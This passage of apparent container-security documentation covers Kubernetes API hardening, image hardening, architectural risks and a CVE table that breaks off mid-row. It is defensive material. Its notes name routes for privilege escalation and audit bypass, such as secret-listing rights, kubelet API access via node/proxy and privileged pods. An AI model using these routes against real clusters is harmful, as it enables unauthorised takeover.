Kubernetes](https://raesene.github.io/blog/2022/09/20/Assessing-Kubernetes-Clusters-for-PCI-Compliance/). 
8 | 9 | - [Authentication](https://raesene.github.io/blog/2022/10/01/PCI-Kubernetes-Section1-Authentication/) 10 | - [Authorization](https://raesene.github.io/blog/2022/10/08/PCI-Kubernetes-Section2-Authorization/) 11 | - [Workload Security](https://raesene.github.io/blog/2022/10/15/PCI-Kubernetes-Section3-workload-security/) 12 | - [Network Security](https://raesene.github.io/blog/2022/10/23/PCI-Kubernetes-Section4-network-security/) 13 | - [PKI](https://raesene.github.io/blog/2022/10/29/PCI-Kubernetes-Section5-PKI/) 14 | - [Secrets Management](https://raesene.github.io/blog/2022/11/06/PCI-Kubernetes-Section6-Secrets-Management/) 15 | - [Container Orchestration Tool Auditing](https://raesene.github.io/blog/2022/11/12/PCI-Kubernetes-Section7-Auditing/) 16 | - [Container Monitoring](https://raesene.github.io/blog/2022/11/19/PCI-Kubernetes-Section8-monitoring/) 17 | - [Runtime Security](https://raesene.github.io/blog/2022/11/27/PCI-Kubernetes-Section9-Runtime-Security/) 18 | - [Patching](https://raesene.github.io/blog/2022/12/03/PCI-Kubernetes-Section10-Patching/) 19 | - [Resource Management](https://raesene.github.io/blog/2022/12/10/PCI-Kubernetes-Section11-Resource-Management/) 20 | - [Container Image Building](https://raesene.github.io/blog/2022/12/12/PCI-Kubernetes-Section12-Container-Image-Building/) 21 | - [Registry](https://raesene.github.io/blog/2022/12/14/PCI-Kubernetes-Section13-Registry/) 22 | - [Version Management](https://raesene.github.io/blog/2022/12/16/PCI-Kubernetes-Section14-Version-Management/) 23 | - [Configuration Management](https://raesene.github.io/blog/2022/12/18/PCI-Kubernetes-Section15-Configuration-Management/) 24 | - [Segmentation](https://raesene.github.io/blog/2022/12/20/PCI-Kubernetes-Section16-Segmentation/) -------------------------------------------------------------------------------- /defenders/container_image_hardening.md: -------------------------------------------------------------------------------- 1 | # Defenders - Container Image Hardening 2 | 3 | Improving the security of container images generally focuses on removing unnecessary software to reduce the attack surface. In addition to this, avoiding risky software installation practices is a good idea if you're building production container images, and for all images, avoiding running as the root user is important. 4 | 5 | ## Attack surface reduction 6 | 7 | There are a number of options for reducing your container image attack surface. 8 | 9 | ### "Scratch" base image 10 | 11 | This is essentially an almost empty base image with no package management or other operating system libraries. Whether this is a practical option for a given image largely depends on how the application you want to run in the container works. For a scratch image to be usable, your application needs to be able to run without any supporting operating system libraries. 12 | 13 | Things like statically compiled Golang or ASP.Net Core applications can often work in scratch containers, whereas others which use a lot of supporting libraries are unlikely to have an easy time using this approach. 14 | 15 | ### Google Distroless 16 | 17 | [Google Distroless images](https://github.com/GoogleContainerTools/distroless) provide a very small but more functional image than scratch. They include some important files like timezone files and SSL certificates. These files mean they have wider/easier compatibility than scratch images, but they are still very small and have a very limited attack surface. 
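A minimal sketch of how a distroless base is typically used, via a multi-stage build. The image tags, the Go toolchain and the `example/minimal-app` name are illustrative assumptions rather than anything this site prescribes:

```bash
# Write an example multi-stage Dockerfile: build in a full toolchain image,
# then copy only the static binary into a distroless base with no shell or package manager.
cat > Dockerfile <<'EOF'
FROM golang:1.22 AS build
WORKDIR /src
COPY . .
RUN CGO_ENABLED=0 go build -o /app .

# The :nonroot tag runs the container as an unprivileged user by default
FROM gcr.io/distroless/static-debian12:nonroot
COPY --from=build /app /app
ENTRYPOINT ["/app"]
EOF

docker build -t example/minimal-app .
```

The resulting image contains the binary, CA certificates and timezone data, but no shell, which also makes exec-style debugging harder; that trade-off is worth considering before adopting this approach.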
18 | 19 | ### Alpine 20 | 21 | [Alpine Linux](https://www.alpinelinux.org/) is a popular option for smaller container images. It has the advantage of a small base image, but keeps the option of easily adding new operating system packages where needed. There can be some compatibility challenges as it defaults to using `musl` rather than `glibc` for its C library, but Alpine-based images have pretty wide compatibility. 22 | 23 | ### Wolfi 24 | 25 | [Wolfi OS](https://github.com/wolfi-dev) is a project dedicated to producing minimal container images. The package manager is based on Alpine Linux's APK and there's support for `glibc` and `musl`. It's a newer option than the alternatives mentioned here, but worth considering to see if it's a good fit for your use case. -------------------------------------------------------------------------------- /defenders/kubernetes_api_security.md: -------------------------------------------------------------------------------- 1 | # API Security 2 | 3 | Kubernetes provides a number of APIs which perform the various functions of a cluster. There are, roughly speaking, three sets: the control plane APIs (API Server, Controller Manager and Scheduler), the worker node APIs (Kubelet and Kube Proxy) and etcd, which may sit with the control plane nodes but can also run on standalone nodes. 4 | 5 | An important point when reviewing or securing these APIs is that in managed Kubernetes distributions (e.g. EKS, GKE, AKS) it is not possible for cluster operators to directly change the configuration of most of the APIs unless the cloud provider makes that available. The exception is the Kubelet, which runs on worker nodes which are available to the cluster operator (unless it uses a "serverless" model like EKS Fargate). 6 | 7 | ## API Visibility 8 | 9 | An initial point when hardening Kubernetes APIs is the decision to restrict access to them at a network level. Whilst it is unwise to rely on IP address filtering as a sole security control, it can help as a layer of defence. For example, consider the case where an administrator has lost a set of credentials, or where an attacker has been able to grab a service account token from a cluster. If the API Server is exposed to the Internet, the attacker can then use those stolen credentials easily, whereas restrictions on which IP addresses can connect to the API server buy time for the defenders to notice the attack and rotate the credentials. 10 | 11 | How you restrict access will depend on the type of Kubernetes in use. For cloud managed distributions (which mostly default to making the API server available over the Internet) a cloud provider setting can be used to restrict access. The cloud provider can often also provide some kind of VPN-like access to their services which might be usable to provide access to the API server. 12 | 13 | For unmanaged distributions, a VPN or bastion host configuration can be used to allow access where needed. 14 | 15 | 16 | ## Kubernetes API Server 17 | 18 | This listens on a variety of ports depending on the distribution in use. Common options are 443/TCP, 6443/TCP and 8443/TCP. In most distributions the `anonymous-auth` flag will be set to `true`. This provides unauthenticated users with access to specific paths specified in the RBAC configuration of the cluster. 
For example in a Kubeadm cluster the following paths are available without authentication 19 | 20 | ```yaml 21 | rules: 22 | - nonResourceURLs: 23 | - /healthz 24 | - /livez 25 | - /readyz 26 | - /version 27 | - /version/ 28 | verbs: 29 | - get 30 | ``` 31 | 32 | These are generally for liveness checks, but the `/version` endpoint does provide information useful to attackers like precise version information. From a historical perspective, it's worth noting that clusters on 1.14 or earlier will likely provide additional access to unauthenticated users. 33 | 34 | In terms of hardening recommendations for the API server the main one is 35 | 36 | * Disable anonymous authentication where possible, where it is required, ensure that minimal paths are available to unauthenticated users. 37 | 38 | Another area to watch out for is the "insecure API service". This has been [disabled in recent versions](https://github.com/kubernetes/kubernetes/issues/91506) of Kubernetes but may still exist in older clusters. Typically it listened on port 8080/TCP and provided `cluster-admin` access to anyone who could reach it at a network level! 39 | 40 | * Ensure that the `--insecure-port` flag (if available) is set to `0`. 41 | 42 | ## Kubernetes Controller Manager 43 | 44 | Access to the controller manager is generally allowed over port 10257/TCP (can vary with version and distribution). In terms of anonymous access a small number of paths can be specified as a command line flag to allow access, the default settings is as below 45 | 46 | ``` 47 | --authorization-always-allow-paths strings Default: "/healthz,/readyz,/livez" 48 | ``` 49 | 50 | In terms of recommendations :- 51 | 52 | * Review paths which are allowed for anonymous access to ensure that no sensitive data is accessible without authentication. 53 | 54 | ## Kubernetes Scheduler 55 | 56 | Access to the scheduler is generally allowed over port 10259/TCP (can vary with version and distribution). In terms of access this is very similar to the controller manager, the same parameter and default exists, and the recommendation would be the same. In general for both these services there aren't a lot of good reasons for direct access so outside of health checking there shouldn't be much of a requirement for unauthenticated access. 57 | 58 | ## Kubelet 59 | 60 | The Kubelet runs on every worker node (and possibly control plane nodes). Access is via 10250/TCP. The kubelet's configuration with regards to anonymous access is a bit odd and not the same as either the scheduler or controller manager. Anonymous access defaults to being allowed, so it's a requirement of the distribution that they disable it (either on the command line or in the kubelet's configuration file). 61 | 62 | Requests to the root path of the server will return 404, but requests to meaningful paths (like `/pods/`) will return 401 (if anonymous authentication is disabled) or 403 (if anonymous authentication is enabled). 63 | 64 | * Ensure that Kubelet anonymous authentication is disabled unless explicitly required for the operation of the cluster. 65 | 66 | Another legacy option that can still be found in Kubernetes clusters is the use of the "read-only" version of the Kubelet API. This service is not authenticated (and there's no authentication option). It listens on port 10255/TCP by default 67 | 68 | * Ensure that the `--read-only-port` flag on the Kubelet is set to `0`. 
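A quick way to verify both of these settings is to check the kubelet configuration on a node and probe the ports from the network. This is a sketch assuming a kubeadm-style install where the kubelet's configuration file is at `/var/lib/kubelet/config.yaml`; other distributions may set these options via command line flags or a different file path, and `[NODE_IP]` is a placeholder.

```bash
# On the node: anonymous auth should be disabled and the read-only port set to 0
grep -A2 'anonymous:' /var/lib/kubelet/config.yaml   # expect "enabled: false"
grep 'readOnlyPort' /var/lib/kubelet/config.yaml     # expect "readOnlyPort: 0" (or unset)

# From the network: the main port should demand authentication (401),
# and the read-only port should not be listening at all
curl -sk -o /dev/null -w '%{http_code}\n' https://[NODE_IP]:10250/pods/
curl -s --connect-timeout 3 http://[NODE_IP]:10255/pods/ || echo "read-only port not listening"
```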
69 | 70 | ## Kube Proxy 71 | 72 | TBD 73 | 74 | ## etcd 75 | 76 | Etcd, whilst not specifically part of the Kubernetes project, is a core part of most Kubernetes distributions. Generally it listens on ports 2379/TCP and 2380/TCP. In most Kubernetes distributions there's no anonymous access to it by default; client certificate authentication is used, so the recommendation is quite simple: 77 | 78 | * Ensure that etcd is configured to require authentication for all requests. -------------------------------------------------------------------------------- /defenders/kubernetes_security_architecture_considerations.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Security Architecture Considerations 2 | 3 | This is an (at the moment) random list of things to think about when architecting Kubernetes-based systems. They may not all still be current and if you know one's not right, PRs always welcome :) 4 | 5 | 6 | ## CVEs 7 | 8 | - There are a number of CVEs in Kubernetes which have no patch and require manual mitigation from cluster operators. 9 | - [CVE-2020-8561](https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY) 10 | - [CVE-2021-25740](https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE) 11 | - [CVE-2020-8562](https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY) 12 | - [CVE-2020-8554](https://groups.google.com/g/kubernetes-security-announce/c/iZWsF9nbKE8) 13 | 14 | ## Authentication 15 | 16 | - None of the built-in authentication mechanisms shipped with base k8s are suitable for use by users. 17 | - Token authentication requires clear text tokens on disk and an API server restart to change. 18 | - Client certificate authentication does not support revocation (Github issue [here](https://github.com/kubernetes/kubernetes/issues/18982)) 19 | - Kubernetes does not have a user database; it relies on identity information passed from any approved authentication mechanism. 20 | - This means that if you have multiple valid authentication mechanisms, there is a risk of duplicate user identities. N.B. Kubernetes audit logging does record the identity of the user, but not the authentication source. 21 | 22 | 23 | ## RBAC 24 | 25 | - There are various RBAC rights that can allow for privilege escalation (there's a Kubernetes Docs page on this with more information [here](https://kubernetes.io/docs/concepts/security/rbac-good-practices/#privilege-escalation-risks)) 26 | - GET or LIST on secrets at a cluster level (or possibly at a namespace level) will allow for privesc via service account secrets. N.B. LIST on its own will do this. 27 | - Access to ESCALATE, IMPERSONATE or BIND as RBAC verbs can allow privilege escalation. 28 | - The `system:masters` group is **hard-coded** into the API server and provides cluster-admin rights to the cluster. 29 | - Access by a user using this group bypasses authorization webhooks (i.e. the request is never sent to the webhook) 30 | - Access to the node/proxy resource allows for privilege escalation via the kubelet API. Users with this right can either go via the Kubernetes API server to access the kubelet API, *or* go directly to the kubelet API. The kubelet API does not have audit logs and its use bypasses admission control. 31 | 32 | ## Networking 33 | 34 | - Pods allowed to use host networking bypass Kubernetes Network Policies. 35 | - Services allowed to use nodePorts can't be limited by Kubernetes Network Policies. 
36 | - The pod proxy feature can be used to access arbitrary IP addresses **via** the Kubernetes API server (i.e. connections come from the API server address), which may bypass network restrictions (more details [here](https://kinvolk.io/blog/2019/02/abusing-kubernetes-api-server-proxying/)) 37 | 38 | ## Pod Security Standards 39 | 40 | - Without restriction on privileged containers, pods can be used to escalate privileges to node access 41 | - Some capabilities like CAP_SYS_ADMIN will similarly allow for node access 42 | 43 | ## Distributions 44 | 45 | - Many Kubernetes distributions provide a first user which uses a client certificate (so no revocation) bound to the system:masters group, so guaranteed cluster-admin. 46 | - Some distributions place sensitive information such as the API server certificate authority private key in a configmap (e.g. [RKE1](https://github.com/rancher/rke/issues/1024)) 47 | 48 | ## DNS 49 | - At the moment it is possible to use DNS to enumerate all pods and services in a cluster, which can leak information, especially in multi-tenant clusters. (CoreDNS Issue [here](https://github.com/coredns/coredns/issues/4984)) (script to demonstrate [here](https://github.com/raesene/alpine-containertools/blob/master/scripts/k8s-dns-enum.rb)) 50 | 51 | ## Auditing 52 | - Kubernetes auditing is not enabled by default. 53 | - Allowing direct access to the kubelet API effectively bypasses auditing, so care should be taken in allowing this. 54 | - Whilst audit logging records the user who made the request, it doesn't log the authentication mechanism used. As such, if there are multiple configured authentication mechanisms (e.g. certificate authentication and OIDC) there is a risk that an attacker can create a user account which would appear to be that of another legitimate user. -------------------------------------------------------------------------------- /general_information/container_cve_list.md: -------------------------------------------------------------------------------- 1 | # Container CVE List 2 | 3 | ## Kubernetes 4 | 5 | There is now an officially maintained list of Kubernetes security vulnerabilities [here](https://kubernetes.io/docs/reference/issues-security/official-cve-feed/). I'll continue to maintain the list below for additional info links, but in general the official list is the best place for the latest vulns. 
6 | 7 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More info | 8 | |---|---|---|---|---| 9 | | [CVE-2023-5528](https://nvd.nist.gov/vuln/detail/CVE-2023-5528)| 7.2 | Privilege escalation on Windows nodes via in-tree storage plugin | | | | 10 | | [CVE-2023-3955](https://nvd.nist.gov/vuln/detail/CVE-2023-3955) | 8.8 | Privilege escalation on Windows nodes due to insufficient input sanitization | | | | 11 | | [CVE-2023-3893](https://nvd.nist.gov/vuln/detail/CVE-2023-3893) | 8.8 | Privilege escalation via kubernetes-csi-proxy on Windows nodes | | | | 12 | | [CVE-2023-3676](https://nvd.nist.gov/vuln/detail/CVE-2023-3676) | 8.8 | Privilege escalation on Windows nodes due to insufficient input sanitization | | | | 13 | | [CVE-2023-2431](https://nvd.nist.gov/vuln/detail/CVE-2023-2431) | 3.4 | Bypass of seccomp profile enforcement| | | | 14 | | [CVE-2023-2727](https://nvd.nist.gov/vuln/detail/CVE-2023-2727), [CVE-2023-2728](https://nvd.nist.gov/vuln/detail/CVE-2023-2728) | N/A | Bypassing policies imposed by the ImagePolicyWebhook and ServiceAccount admission plugin | | | | 15 | | [CVE-2023-2878](https://nvd.nist.gov/vuln/detail/CVE-2023-2878) | 6.5 | Service account tokens disclosed in logs by secrets-store-csi-driver | | | | 16 | |[CVE-2022-3294](https://github.com/kubernetes/kubernetes/issues/113757) | 6.6 | Node address isn't always verified when proxying | Earlier than v1.21.14, v1.22.0 - v1.22.15, v1.23.0 - v1.23.13, v1.24.0 - v1.24.7, v1.25.0 - v1.25.3 | v1.22.16, v1.23.14, v1.24.8, v1.25.4 | | 17 | |[CVE-2022-3162](https://github.com/kubernetes/kubernetes/issues/113756) | 6.5 | Unauthorized read of Custom Resources | Earlier than v1.21.14, v1.22.0 - v1.22.15, v1.23.0 - v1.23.13, v1.24.0 - v1.24.7, v1.25.0 - v1.25.3 | v1.22.16, v1.23.14, v1.24.8, v1.25.4 | | 18 | |[CVE-2022-3172](https://github.com/kubernetes/kubernetes/issues/112513) | 5.1 | Aggregated API server can cause clients to be redirected (SSRF) | Earlier than v1.21.14, v1.22.0 - v1.22.13, v1.23.0 - v1.23.10, v1.24.0 - v1.24.4, v1.25.0 | v1.22.14, v1.23.11, v1.24.5, v1.25.1 | | 19 | |[CVE-2021-25749](https://github.com/kubernetes/kubernetes/issues/112192) | 3.4 | `runAsNonRoot` logic bypass for Windows containers | v1.20 - v1.21, v1.22.0 - v1.22.13, v1.23.0 - v1.23.10, v1.24.0 - v1.24.4 | v1.22.14, v1.23.11, v1.24.5, v1.25.0 | | 20 | |[CVE-2020-8561](https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY) | 4.1 | Webhook redirect in kube-apiserver | All | No Patch Available | | 21 | |[CVE-2021-25741](https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s)| 8.8 | Symlink Exchange Can Allow Host Filesystem Access | v1.22.0 - v1.22.1, v1.21.0 - v1.21.4, v1.20.0 - v1.20.10, Earlier than v1.19.15 | v1.22.2, v1.21.5, v1.20.11, v1.19.15 | | 22 | |[CVE-2021-25740](https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE)| 3.1 | Endpoint & EndpointSlice permissions allow cross-Namespace forwarding | All | No Patch Available (mitigations in advisory) | | 23 | |[CVE-2021-25737](https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY)| 2.7 | Holes in EndpointSlice Validation Enable Host Network Hijack |v1.21.0, v1.20.0 - v1.20.6, v1.19.0 - v1.19.10, v1.16.0 - v1.18.18 | v1.21.1, v1.20.7, v1.19.11, v1.18.19 | | 24 | |[CVE-2021-25736](https://groups.google.com/g/kubernetes-security-announce/c/lIoOPObO51Q)| 5.8 | Windows kube-proxy LoadBalancer contention | v1.20.0 - v1.20.5, v1.19.0 - v1.19.9, v1.18.0 - v1.18.17 | v1.21.0, v1.20.6, v1.19.10, v1.18.18 | | 25 | 
|[CVE-2020-8562](https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY)| 2.2 | Bypass of Kubernetes API Server proxy TOCTOU | v1.21.0, v1.20.0 - v1.20.6, v1.19.0 - v1.19.10, v1.18.0 - v1.18.18 | No Patch Available (mitigations in advisory) | | 26 | |[CVE-2021-25735](https://groups.google.com/g/kubernetes-security-announce/c/FKAGqT4jx9Y)| 6.5 | Validating Admission Webhook does not observe some previous fields | v1.20.0 - v1.20.5, v1.19.0 - v1.19.9, Earlier than v1.18.17 | v1.21.0, v1.20.6, v1.19.10, v1.18.18 | | 27 | |[CVE-2020-8554](https://groups.google.com/g/kubernetes-security-announce/c/iZWsF9nbKE8)| 6.3 | Man in the middle using LoadBalancer or ExternalIPs | All | No Patch Available (mitigations in advisory) | | 28 | |[CVE-2020-8565](https://groups.google.com/g/kubernetes-security-announce/c/9d0gPe7SCM8)| 4.7 | Token Leaks in verbose logs | all v1.19 and earlier | v1.20.0 | | 29 | |[CVE-2020-8559](https://groups.google.com/g/kubernetes-security-announce/c/JAIGG5yNROs)| 6.4 | Privilege escalation from compromised node to cluster | v1.18.0-1.18.5, v1.17.0-1.17.8, v1.16.0-1.16.12, all v1.15 and earlier | v1.18.6, v1.17.9, v1.16.13 | | 30 | |[CVE-2020-8558](https://groups.google.com/g/kubernetes-security-announce/c/B1VegbBDMTE)| 5.4 | Kubernetes: Node setting allows for neighboring hosts to bypass localhost boundary | v1.18.0-1.18.3, v1.17.0-1.17.6, earlier than v1.16.10 | v1.18.4, v1.17.7, v1.16.11 | | 31 | |[CVE-2020-8557](https://groups.google.com/g/kubernetes-security-announce/c/cB_JUsYEKyY)| 5.5 | Node disk DOS by writing to container /etc/hosts | v1.18.0-1.18.5, v1.17.0-1.17.8, earlier than v1.16.13 | v1.18.6, v1.17.9, v1.16.13 | | 32 | |[CVE-2020-8555](https://groups.google.com/g/kubernetes-security-announce/c/kEK27tqqs30)| 6.3 | Half-Blind SSRF in kube-controller-manager | v1.18.0, v1.17.0 - v1.17.4, v1.16.0 - v1.16.8, earlier than v1.15.11 | v1.18.1, v1.17.5, v1.16.9, v1.15.12 | [finder's blog](https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8) | 33 | |[CVE-2019-11254](https://groups.google.com/g/kubernetes-security-announce/c/wuwEwZigXBc)| 6.5 | Denial of service vulnerability from malicious YAML payloads |v1.17.0-v1.17.2, v1.16.0-v1.16.6, earlier than v1.15.10 | v1.17.3, v1.16.7, v1.15.10 | | 34 | |[CVE-2020-8552](https://groups.google.com/g/kubernetes-security-announce/c/2UOlsba2g0s)| 5.3 | Denial of service from authenticated requests to the Kube API server| v1.17.0-v1.17.2, v1.16.0-v1.16.6, earlier than v1.15.10 | v1.17.3, v1.16.7, v1.15.10 | | 35 | |[CVE-2020-8551](https://groups.google.com/g/kubernetes-security-announce/c/2UOlsba2g0s)| 4.3 | Denial of service from authenticated requests to the Kubelet |v1.17.0-v1.17.2, v1.16.0-v1.16.6, v1.15.0-v1.15.10 | v1.17.3, v1.16.7, v1.15.10| | 36 | |[CVE-2019-11253](https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs)| 7.5 | Denial of Service from malicious YAML or JSON payloads | v1.16.0-v1.16.1, v1.15.0-v1.15.4, v1.14.0-v1.14.7, earlier than v1.13.11 | v1.16.2, v1.15.5, v1.14.8, v1.13.12 | | 37 | |[CVE-2019-11251](https://groups.google.com/g/kubernetes-security-announce/c/6vTrp6tVpHo)| 5.7 | kubectl cp could lead to files being created outside its destination directory | v1.15.0-v1.15.3, v1.14.0-v1.14.6, earlier than v1.13.10 | v1.16.0, v1.15.4, v1.14.7, v1.13.11 | | 38 | |[CVE-2019-11248](https://groups.google.com/g/kubernetes-security-announce/c/pKELclHIov8)| 8.2 | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz
port | v1.14.0 - v1.14.4, v1.13.0 - v1.13.8, earlier than v1.12.10 | v1.15.0, v1.14.4, v1.13.8, and v1.12.10 | | 39 | |[CVE-2019-11247](https://groups.google.com/g/kubernetes-security-announce/c/vUtEcSEY6SM)| 8.1 | API server allows access to custom resources via wrong scope | v1.15.0 - v1.15.1, v1.14.0 - v1.14.5, earlier than v1.13.9 | v1.15.2, v1.14.5, v1.13.9 | | 40 | |[CVE-2019-11249](https://groups.google.com/g/kubernetes-security-announce/c/vUtEcSEY6SM)| 6.5 | kubectl cp potential directory traversal | v1.15.0 - v1.15.1, v1.14.0 - v1.14.5, earlier than v1.13.9 | v1.15.2, v1.14.5, v1.13.9 | | 41 | |[CVE-2019-11246](https://groups.google.com/g/kubernetes-security-announce/c/NLs2TGbfPdo)| 6.5 | kubectl cp could lead to files being created outside its destination directory | v1.14.0-v1.14.1, v1.13.0-v1.13.5, earlier than v1.12.9 | v1.12.9, v1.13.6, v1.14.2 | | 42 | |[CVE-2019-11245](https://groups.google.com/g/kubernetes-security-announce/c/lAs07uKLq2k)| 7.8 | Security regression in Kubernetes kubelet | v1.13.6, v1.14.2 | v1.13.7, v1.14.3 | | 43 | |[CVE-2019-1002101](https://groups.google.com/g/kubernetes-security-announce/c/OYFV1hiDE2w)| 5.5 | kubectl - potential directory traversal in kubectl cp | v1.13.0-v1.13.4, v1.12.0-v1.12.6, earlier than v1.11.9 | v1.11.9, v1.12.7, v1.13.5, v1.14.0 | | 44 | |[CVE-2019-1002100](https://groups.google.com/g/kubernetes-security-announce/c/i-HEIs8WC5w)|6.5 | kube-apiserver authenticated DoS risk | v1.13.0 - v1.13.3, v1.12.0 - v1.12.5, earlier than v1.11.8 | v1.11.8, v1.12.6, v1.13.4 | | 45 | |[CVE-2018-1002105](https://groups.google.com/g/kubernetes-security-announce/c/fm1MkmubMoI)|9.8 | Kubernetes Aggregated API credential re-use | v1.12.0-v1.12.2, v1.11.0-v1.11.4, earlier than v1.10.11 | v1.10.11, v1.11.5, v1.12.3 | | 46 | 47 | - Information from [kubernetes-security-announce](https://groups.google.com/g/kubernetes-security-announce) 48 | 49 | ## runc 50 | 51 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 52 | |[CVE-2024-21626](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)|8.6| Several container breakouts due to internally leaked fds|>=v1.0.0-rc93,<=1.1.11|1.1.12|[Withsecure Write-up](https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626) | 53 | |[CVE-2022-29162](https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66) | 7.8 | Default inheritable capabilities for linux container should be empty | < 1.1.2 | 1.1.2 | | 54 | |[CVE-2021-43784](https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f) | 5.0 |Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration | <1.0.3 | 1.0.3 | | 55 | |[CVE-2021-30465](https://github.com/advisories/GHSA-c3xm-pvg7-gh7r) | 7.6 |Container Filesystem Breakout via Directory Traversal | <= 1.0.0-rc94 |1.0.0-rc95 |[Etienne Champtar's Blog](http://blog.champtar.fr/runc-symlink-CVE-2021-30465/) | 56 | |[CVE-2019-16884](https://nvd.nist.gov/vuln/detail/CVE-2019-16884) | 7.5 |Apparmor restriction bypass | <= 1.0-rc8 | 1.0-rc9 | | 57 | |[CVE-2019-5736](https://nvd.nist.gov/vuln/detail/CVE-2019-5736) | 8.6 |runc Privilege Escalation | <= 1.0-rc6 | 1.0-rc7 | [Dragon Sector Blog](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) | 58 | |[CVE-2016-9962](https://nvd.nist.gov/vuln/detail/CVE-2016-9962) | 6.4 |Container escape via ptrace | Docker < 1.12.6 | Docker >= 1.12.6 | | 59 | 60 | 61 | ## ContainerD
62 | 63 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 64 | | [CVE-2023-25153](https://github.com/containerd/containerd/security/advisories/GHSA-259w-8hf6-59c2) | 5.5 | OCI image importer memory exhaustion | <= 1.5.17, 1.6.0-1.6.17 | 1.5.18, 1.6.18 | | 65 | | [CVE-2023-25173](https://github.com/containerd/containerd/security/advisories/GHSA-hmfx-3pcx-653p) | 5.5 | Supplementary groups are not set up properly | <= 1.5.17, 1.6.0-1.6.17 | 1.5.18, 1.6.18 | | 66 | | [CVE-2022-23471](https://github.com/containerd/containerd/security/advisories/GHSA-2qjp-425j-52j9) | 5.7 | containerd CRI stream server: Host memory exhaustion through Terminal resize goroutine leak | < 1.5.16, 1.6.0-1.6.11 | 1.5.16, 1.6.12 | | 67 | | [CVE-2022-31030](https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf) | 5.5 | containerd CRI plugin: Host memory exhaustion through ExecSync | <= 1.5.12, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5 | 1.5.13, 1.6.6 | | 68 | | [CVE-2022-24769](https://github.com/containerd/containerd/security/advisories/GHSA-c9cp-9c75-9v8c) | 5.9 | Default inheritable capabilities for linux container should be empty | <= 1.5.10, 1.6.0, 1.6.1 | 1.5.11, 1.6.2 | | 69 | | [CVE-2022-23648](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) | 7.5 | containerd CRI plugin: Insecure handling of image volumes | <= 1.4.12, 1.5.0 - 1.5.9, 1.6.0 | 1.4.13, 1.5.10, 1.6.1 | [PoC repo](https://github.com/raesene/CVE-2022-23648-POC) | 70 | | [CVE-2021-43816](https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c) | 9.1 | containerd CRI plugin: Unprivileged pod using `hostPath` can side-step SELinux | >= 1.5.0, < 1.5.9 | 1.5.9 | | 71 | | [CVE-2021-41103](https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq) | 5.9 | Insufficiently restricted permissions on container root and plugin directories | <1.4.11,<1.5.7 | 1.4.11,1.5.7 | | 72 | | [CVE-2021-32760](https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w) | 6.3 | Archive package allows chmod of file outside of unpack target directory | <=1.4.7, <=1.5.3 | 1.5.4, 1.4.8 | | 73 | | [CVE-2021-21334](https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4) | 6.3 | containerd CRI plugin: environment variables can leak between containers | <=1.3.9, <= 1.4.3 | 1.3.10, 1.4.4 | | 74 | | [CVE-2020-15157](https://github.com/containerd/containerd/security/advisories/GHSA-742w-89gc-8m9c) | 6.1 | containerd v1.2.x can be coerced into leaking credentials during image pull | < 1.3.0 | 1.2.14, 1.3.0 | [Darkbit Blog Post](https://darkbit.io/blog/cve-2020-15157-containerdrip) | 75 | | [CVE-2020-15257](https://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4) | 5.2 | containerd-shim API exposed to host network containers | <=1.3.7, 1.4.0, 1.4.1 | 1.3.9, 1.4.3 | [NCC Group Technical Vulnerability Discussion](https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/) | 76 | 77 | 78 | ## Docker 79 | 80 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 81 | | [CVE-2022-36109](https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4) | 6.3 | Security vulnerability relating to supplementary group permissions | < 20.10.18 | 20.10.18 | | 82 | | [CVE-2021-41190](https://github.com/moby/moby/security/advisories/GHSA-xmmx-7jpf-fx42) | 5.0 | Ambiguous OCI manifest parsing | < 20.10.11 |
